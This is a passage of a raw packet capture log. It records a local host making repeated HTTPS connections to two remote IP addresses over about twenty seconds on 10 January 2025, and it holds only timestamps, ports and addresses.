                                                    Jan 10, 2025 15:39:38.225429058 CET52214443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:38.227375031 CET52214443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:38.227391005 CET44352214172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:38.227607012 CET44352214172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:38.227653980 CET52214443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:38.228163004 CET52214443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:38.275332928 CET44352214172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:38.616482973 CET44352214172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:38.616558075 CET52214443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:38.616590023 CET44352214172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:38.616632938 CET52214443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:38.616785049 CET52214443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:38.616828918 CET44352214172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:38.616883993 CET52214443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:38.622661114 CET52215443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:38.622694016 CET44352215142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:38.622771025 CET52215443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:38.623032093 CET52215443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:38.623044014 CET44352215142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:39.252451897 CET44352215142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:39.255403042 CET52215443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:39.255798101 CET52215443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:39.255808115 CET44352215142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:39.256031036 CET52215443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:39.256035089 CET44352215142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:39.669620991 CET44352215142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:39.669713020 CET52215443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:39.669732094 CET44352215142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:39.669745922 CET44352215142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:39.669780970 CET52215443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:39.670506954 CET52215443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:39.670522928 CET44352215142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:39.799263000 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:39.799338102 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:39.799439907 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:39.799755096 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:39.799767971 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.432686090 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.432825089 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:40.433772087 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.433854103 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:40.435213089 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:40.435221910 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.435621977 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.435677052 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:40.435940981 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:40.483325005 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.815516949 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.815634012 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:40.815663099 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.815706968 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:40.817059994 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.817106009 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:40.817131996 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.817174911 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:40.865628004 CET52217443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:40.865662098 CET44352217172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:40.872348070 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:40.872411966 CET44352218142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:40.872488022 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:40.872876883 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:40.872889996 CET44352218142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:41.682380915 CET44352218142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:41.682460070 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:41.682966948 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:41.682981014 CET44352218142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:41.683157921 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:41.683166027 CET44352218142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:42.105271101 CET44352218142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:42.105320930 CET44352218142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:42.105355024 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:42.105427027 CET44352218142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:42.105458975 CET44352218142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:42.105467081 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:42.105494976 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:42.105515003 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:42.106602907 CET52218443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:42.106642008 CET44352218142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:42.252460003 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:42.252512932 CET44352219172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:42.252736092 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:42.252912045 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:42.252917051 CET44352219172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:42.906352043 CET44352219172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:42.907888889 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:42.908391953 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:42.908402920 CET44352219172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:42.908574104 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:42.908584118 CET44352219172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:43.313543081 CET44352219172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:43.313607931 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:43.313632011 CET44352219172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:43.313677073 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:43.314863920 CET44352219172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:43.314912081 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:43.314935923 CET44352219172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:43.314944983 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:43.314956903 CET44352219172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:43.314975977 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:43.314991951 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:43.315013885 CET52219443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:43.321890116 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:43.321930885 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:43.322009087 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:43.322316885 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:43.322326899 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:43.960772038 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:43.960988998 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:43.961438894 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:43.961448908 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:43.961604118 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:43.961610079 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:44.448333025 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:44.448395967 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:44.448410034 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:44.448435068 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:44.448450089 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:44.448455095 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:44.448466063 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:44.448499918 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:44.448503971 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:44.448539972 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:44.448548079 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:44.448594093 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:44.449807882 CET52220443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:44.449826956 CET44352220142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:44.564807892 CET52221443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:44.564861059 CET44352221172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:44.565001965 CET52221443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:44.565476894 CET52221443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:44.565493107 CET44352221172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:45.198111057 CET44352221172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:45.198205948 CET52221443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:45.199217081 CET52221443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:45.199229002 CET44352221172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:45.199421883 CET52221443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:45.199429035 CET44352221172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:45.576020956 CET44352221172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:45.576092005 CET52221443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:45.576122999 CET44352221172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:45.576172113 CET52221443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:45.576312065 CET52221443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:45.576373100 CET44352221172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:45.576436043 CET52221443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:45.582343102 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:45.582389116 CET44352222142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:45.582449913 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:45.582808018 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:45.582818031 CET44352222142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:46.353101969 CET44352222142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:46.353241920 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:46.353912115 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:46.353916883 CET44352222142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:46.354150057 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:46.354154110 CET44352222142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:46.778072119 CET44352222142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:46.778145075 CET44352222142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:46.778213024 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:46.778227091 CET44352222142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:46.778239965 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:46.778251886 CET44352222142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:46.778280973 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:46.778314114 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:46.779167891 CET52222443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:46.779187918 CET44352222142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:46.893043995 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:46.893102884 CET44352223172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:46.893198013 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:46.893657923 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:46.893675089 CET44352223172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:47.604188919 CET44352223172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:47.604327917 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:47.604921103 CET44352223172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:47.605006933 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:47.607389927 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:47.607399940 CET44352223172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:47.607661009 CET44352223172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:47.607713938 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:47.608158112 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:47.651330948 CET44352223172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:48.014098883 CET44352223172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:48.014240980 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:48.014271975 CET44352223172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:48.014316082 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:48.014472961 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:48.014508009 CET44352223172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:48.014555931 CET52223443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:48.021042109 CET52224443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:48.021081924 CET44352224142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:48.021259069 CET52224443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:48.021461964 CET52224443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:48.021471977 CET44352224142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:48.808711052 CET44352224142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:48.808795929 CET52224443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:48.809344053 CET52224443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:48.809353113 CET44352224142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:48.809529066 CET52224443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:48.809535980 CET44352224142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:49.248117924 CET44352224142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:49.248172998 CET44352224142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:49.248222113 CET52224443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:49.248222113 CET52224443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:49.248239040 CET44352224142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:49.248342037 CET52224443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:49.248977900 CET52224443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:49.248996019 CET44352224142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:49.363044977 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:49.363089085 CET44352225172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:49.363336086 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:49.363846064 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:49.363861084 CET44352225172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:49.989428997 CET44352225172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:49.989605904 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:49.990547895 CET44352225172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:49.990746021 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:49.992332935 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:49.992347002 CET44352225172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:49.992727041 CET44352225172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:49.992939949 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:49.993221998 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:50.035336018 CET44352225172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:50.375802040 CET44352225172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:50.375864983 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:50.375878096 CET44352225172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:50.375916004 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:50.376027107 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:50.376080036 CET44352225172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:50.376125097 CET52225443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:50.380752087 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:50.380795002 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:50.380878925 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:50.381119967 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:50.381128073 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:51.040699005 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:51.040863991 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:51.041457891 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:51.041464090 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:51.041676044 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:51.041678905 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:51.485687017 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:51.485743999 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:51.485765934 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:51.485800028 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:51.485836029 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:51.485836029 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:51.485841990 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:51.485884905 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:51.485903025 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:51.485944986 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:51.487005949 CET52226443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:51.487019062 CET44352226142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:51.613883018 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:51.613925934 CET44352227172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:51.614079952 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:51.615335941 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:51.615350962 CET44352227172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:52.252646923 CET44352227172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:52.252731085 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:52.253391027 CET44352227172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:52.253437996 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:52.266710997 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:52.266731977 CET44352227172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:52.267043114 CET44352227172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:52.267103910 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:52.270144939 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:52.311330080 CET44352227172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:52.651196957 CET44352227172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:52.651274920 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:52.651285887 CET44352227172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:52.651346922 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:52.651503086 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:52.651531935 CET44352227172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:52.651587009 CET52227443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:52.657413006 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:52.657447100 CET44352228142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:52.657530069 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:52.657830000 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:52.657845974 CET44352228142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:53.309567928 CET44352228142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:53.309978008 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:53.310461998 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:53.310472012 CET44352228142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:53.310965061 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:53.310970068 CET44352228142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:53.790760040 CET44352228142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:53.790802956 CET44352228142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:53.790910959 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:53.790910959 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:53.790923119 CET44352228142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:53.790944099 CET44352228142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:53.791646004 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:53.791646004 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:53.908726931 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:53.908767939 CET44352229172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:53.909105062 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:53.909213066 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:53.909219027 CET44352229172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:54.094465017 CET52228443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:54.094496012 CET44352228142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:54.535979986 CET44352229172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:54.536072016 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:54.536628962 CET44352229172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:54.536686897 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:54.543982029 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:54.544003010 CET44352229172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:54.544224977 CET44352229172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:54.544275999 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:54.544539928 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:54.587331057 CET44352229172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:54.930999041 CET44352229172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:54.931097031 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:54.931112051 CET44352229172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:54.931181908 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:54.931339979 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:54.931384087 CET44352229172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:39:54.931433916 CET52229443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:54.937910080 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:54.937947989 CET44352230142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:54.938019037 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:54.938281059 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:54.938296080 CET44352230142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:55.599948883 CET44352230142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:55.600120068 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:55.600814104 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:55.600822926 CET44352230142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:55.600984097 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:55.600990057 CET44352230142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:56.035507917 CET44352230142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:56.035542011 CET44352230142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:56.035875082 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:56.035895109 CET44352230142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:56.035969973 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:56.035980940 CET44352230142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:56.036034107 CET44352230142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:39:56.036046982 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:56.036690950 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:56.036690950 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:56.036731958 CET52230443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:39:56.158601046 CET52231443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:39:56.158638000 CET44352231172.217.18.14192.168.2.7
